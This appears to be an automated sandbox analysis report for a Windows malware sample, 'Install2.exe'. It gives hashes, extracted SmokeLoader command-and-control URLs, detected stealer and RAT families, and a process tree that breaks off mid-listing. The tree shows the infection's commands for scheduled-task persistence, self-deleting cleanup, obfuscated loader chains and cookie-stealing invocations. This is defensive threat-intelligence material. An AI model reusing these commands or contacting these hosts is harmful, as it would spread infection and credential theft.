Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1802s
  • max time network
    1806s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    06-05-2021 08:37

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies registry class 34 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        PID:860
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {224F223F-A906-4F28-9F32-09E778E71C55} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
          3⤵
            PID:436
            • C:\Users\Admin\AppData\Roaming\wuwvjsr
              C:\Users\Admin\AppData\Roaming\wuwvjsr
              4⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1556
              • C:\Users\Admin\AppData\Roaming\wuwvjsr
                C:\Users\Admin\AppData\Roaming\wuwvjsr
                5⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:7304
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {64C08417-3466-4906-808C-2F0152A6DFA1} S-1-5-18:NT AUTHORITY\System:Service:
            3⤵
              PID:2264
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
                4⤵
                • Executes dropped EXE
                PID:2088
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
                4⤵
                • Executes dropped EXE
                PID:1352
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
                4⤵
                • Executes dropped EXE
                PID:3000
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
                4⤵
                • Executes dropped EXE
                PID:1280
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
                4⤵
                • Executes dropped EXE
                PID:3032
              • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
                "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
                4⤵
                • Executes dropped EXE
                PID:1096
              • C:\Windows\system32\rundll32.exe
                C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll",ASqacOXEm
                4⤵
                • Windows security modification
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                PID:7464
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {5DDF9173-7234-496C-BC92-0DCD96A8B47B} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              3⤵
                PID:7960
                • C:\Users\Admin\AppData\Roaming\wuwvjsr
                  C:\Users\Admin\AppData\Roaming\wuwvjsr
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:7996
                  • C:\Users\Admin\AppData\Roaming\wuwvjsr
                    C:\Users\Admin\AppData\Roaming\wuwvjsr
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:8012
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {1C9EEE57-C98C-47BB-A4ED-B7B9A79B2245} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                3⤵
                  PID:7708
                  • C:\Users\Admin\AppData\Roaming\wuwvjsr
                    C:\Users\Admin\AppData\Roaming\wuwvjsr
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:7676
                    • C:\Users\Admin\AppData\Roaming\wuwvjsr
                      C:\Users\Admin\AppData\Roaming\wuwvjsr
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1656
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                PID:2868
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 5CD4866EF822B6A7DE85D0CFA5BA9952 C
                  3⤵
                  • Loads dropped DLL
                  PID:2964
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding ECA4472486E9245E318E15DC56C19627
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:3016
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:2604
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 51F25D81AA32B7BE1CDC33FC15468138 M Global\MSI0000
                  3⤵
                  • Loads dropped DLL
                  PID:2324
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:2384
            • C:\Users\Admin\AppData\Local\Temp\Install2.exe
              "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
              1⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1668
              • C:\Users\Admin\AppData\Local\Temp\is-THDJE.tmp\Install2.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-THDJE.tmp\Install2.tmp" /SL5="$30134,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
                2⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2024
                • C:\Users\Admin\AppData\Local\Temp\is-RKJR5.tmp\Ultra.exe
                  "C:\Users\Admin\AppData\Local\Temp\is-RKJR5.tmp\Ultra.exe" /S /UID=burnerch1
                  3⤵
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:1716
                  • C:\Program Files\Windows Mail\SIZYMIJLWZ\ultramediaburner.exe
                    "C:\Program Files\Windows Mail\SIZYMIJLWZ\ultramediaburner.exe" /VERYSILENT
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:628
                    • C:\Users\Admin\AppData\Local\Temp\is-AJV9B.tmp\ultramediaburner.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-AJV9B.tmp\ultramediaburner.tmp" /SL5="$6012A,281924,62464,C:\Program Files\Windows Mail\SIZYMIJLWZ\ultramediaburner.exe" /VERYSILENT
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of WriteProcessMemory
                      PID:108
                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                        6⤵
                        • Executes dropped EXE
                        PID:904
                  • C:\Users\Admin\AppData\Local\Temp\94-7faf9-7bf-099bc-ed390cc969fed\Gidytylilae.exe
                    "C:\Users\Admin\AppData\Local\Temp\94-7faf9-7bf-099bc-ed390cc969fed\Gidytylilae.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:632
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                      5⤵
                      • Modifies Internet Explorer settings
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SetWindowsHookEx
                      • Suspicious use of WriteProcessMemory
                      PID:1736
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:275457 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1740
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:340994 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:1060
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 1408
                          7⤵
                          • Program crash
                          • Suspicious behavior: GetForegroundWindowSpam
                          PID:920
                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1736 CREDAT:603154 /prefetch:2
                        6⤵
                        • Modifies Internet Explorer settings
                        • Suspicious use of SetWindowsHookEx
                        PID:8060
                    • C:\Program Files\Internet Explorer\iexplore.exe
                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                      5⤵
                        PID:8028
                    • C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Tigehysyga.exe
                      "C:\Users\Admin\AppData\Local\Temp\02-4d779-bd3-26eb3-678bc3ab16014\Tigehysyga.exe"
                      4⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1624
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d4wy5pji.v4m\KiffMainE1.exe & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2592
                        • C:\Users\Admin\AppData\Local\Temp\d4wy5pji.v4m\KiffMainE1.exe
                          C:\Users\Admin\AppData\Local\Temp\d4wy5pji.v4m\KiffMainE1.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:2692
                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                            dw20.exe -x -s 532
                            7⤵
                            • Suspicious behavior: GetForegroundWindowSpam
                            PID:2792
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe /qn CAMPAIGN="654" & exit
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2176
                        • C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe
                          C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe /qn CAMPAIGN="654"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates connected drives
                          • Modifies system certificate store
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:2288
                          • C:\Windows\SysWOW64\msiexec.exe
                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\astyb0fn.ywv\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1620037980 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                            7⤵
                              PID:2760
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qtib13fk.gpq\gpooe.exe & exit
                          5⤵
                            PID:2508
                            • C:\Users\Admin\AppData\Local\Temp\qtib13fk.gpq\gpooe.exe
                              C:\Users\Admin\AppData\Local\Temp\qtib13fk.gpq\gpooe.exe
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2572
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                  PID:1096
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                    PID:2956
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:7812
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                    • Executes dropped EXE
                                    PID:564
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xlwel1da.vo5\google-game.exe & exit
                                5⤵
                                  PID:1352
                                  • C:\Users\Admin\AppData\Local\Temp\xlwel1da.vo5\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\xlwel1da.vo5\google-game.exe
                                    6⤵
                                    • Executes dropped EXE
                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                    • Suspicious use of SetWindowsHookEx
                                    PID:2948
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                      7⤵
                                      • Loads dropped DLL
                                      • Modifies registry class
                                      PID:2268
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\md4doc0e.h0m\huesaa.exe & exit
                                  5⤵
                                    PID:2536
                                    • C:\Users\Admin\AppData\Local\Temp\md4doc0e.h0m\huesaa.exe
                                      C:\Users\Admin\AppData\Local\Temp\md4doc0e.h0m\huesaa.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2568
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1324
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1096
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:7784
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:7660
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kiiklrm1.nco\askinstall39.exe & exit
                                    5⤵
                                      PID:2512
                                      • C:\Users\Admin\AppData\Local\Temp\kiiklrm1.nco\askinstall39.exe
                                        C:\Users\Admin\AppData\Local\Temp\kiiklrm1.nco\askinstall39.exe
                                        6⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        PID:1764
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:2784
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:2756
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwzohxtv.hgb\setup.exe & exit
                                        5⤵
                                          PID:2144
                                          • C:\Users\Admin\AppData\Local\Temp\kwzohxtv.hgb\setup.exe
                                            C:\Users\Admin\AppData\Local\Temp\kwzohxtv.hgb\setup.exe
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2620
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\kwzohxtv.hgb\setup.exe"
                                              7⤵
                                                PID:2276
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 1.1.1.1 -n 1 -w 3000
                                                  8⤵
                                                  • Runs ping.exe
                                                  PID:2672
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iwim43tl.rd5\Setup_v3.exe & exit
                                            5⤵
                                              PID:2480
                                              • C:\Users\Admin\AppData\Local\Temp\iwim43tl.rd5\Setup_v3.exe
                                                C:\Users\Admin\AppData\Local\Temp\iwim43tl.rd5\Setup_v3.exe
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2588
                                                • C:\Windows\SysWOW64\at.exe
                                                  "C:\Windows\System32\at.exe"
                                                  7⤵
                                                    PID:1716
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c cfJhtziJSwbWaavQqftKBOzknThtiEQiDkdMlfkCNBTYvSLeKmkYzx & C:\Windows\System32\cmd.exe < Sta.vstm
                                                    7⤵
                                                      PID:2412
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\System32\cmd.exe
                                                        8⤵
                                                        • Loads dropped DLL
                                                        PID:2340
                                                        • C:\Windows\SysWOW64\findstr.exe
                                                          findstr /V /R "^auPnRNysIHbguzrrqNSScEBqzRPPbdMbFoQYCAfsPGuHOxFbthGdjTOOFOtZYdTsVqJXDtAAbBePnTjYkaLlJckLzezNcd$" Poi.vstm
                                                          9⤵
                                                            PID:2356
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                            Fessura.exe.com Z
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:3060
                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com
                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Fessura.exe.com Z
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:812
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks.exe /create /tn "PjPVhJpbFf" /tr "C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\PjPVhJpbFf.exe.com C:\\Users\\Admin\\AppData\\Roaming\\cpyTzEXhxT\\A" /sc onstart /F /RU SYSTEM
                                                                11⤵
                                                                • Creates scheduled task(s)
                                                                PID:3000
                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                11⤵
                                                                • Executes dropped EXE
                                                                PID:2460
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 127.0.0.1 -n 30
                                                            9⤵
                                                            • Runs ping.exe
                                                            PID:2152
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                                                        7⤵
                                                          PID:1960
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkq23who.je2\toolspab1.exe & exit
                                                      5⤵
                                                        PID:2784
                                                        • C:\Users\Admin\AppData\Local\Temp\gkq23who.je2\toolspab1.exe
                                                          C:\Users\Admin\AppData\Local\Temp\gkq23who.je2\toolspab1.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                          PID:1996
                                                          • C:\Users\Admin\AppData\Local\Temp\gkq23who.je2\toolspab1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\gkq23who.je2\toolspab1.exe
                                                            7⤵
                                                              PID:2184
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chdvhibg.bzu\005.exe & exit
                                                          5⤵
                                                            PID:2944
                                                            • C:\Users\Admin\AppData\Local\Temp\chdvhibg.bzu\005.exe
                                                              C:\Users\Admin\AppData\Local\Temp\chdvhibg.bzu\005.exe
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:3008
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qr5kqshe.te1\SunLabsPlayer.exe /S & exit
                                                            5⤵
                                                              PID:2496
                                                              • C:\Users\Admin\AppData\Local\Temp\qr5kqshe.te1\SunLabsPlayer.exe
                                                                C:\Users\Admin\AppData\Local\Temp\qr5kqshe.te1\SunLabsPlayer.exe /S
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in Program Files directory
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:2752
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:2516
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Drops file in Program Files directory
                                                                    PID:2276
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    PID:2956
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:1948
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstD55B.tmp\tempfile.ps1"
                                                                      7⤵
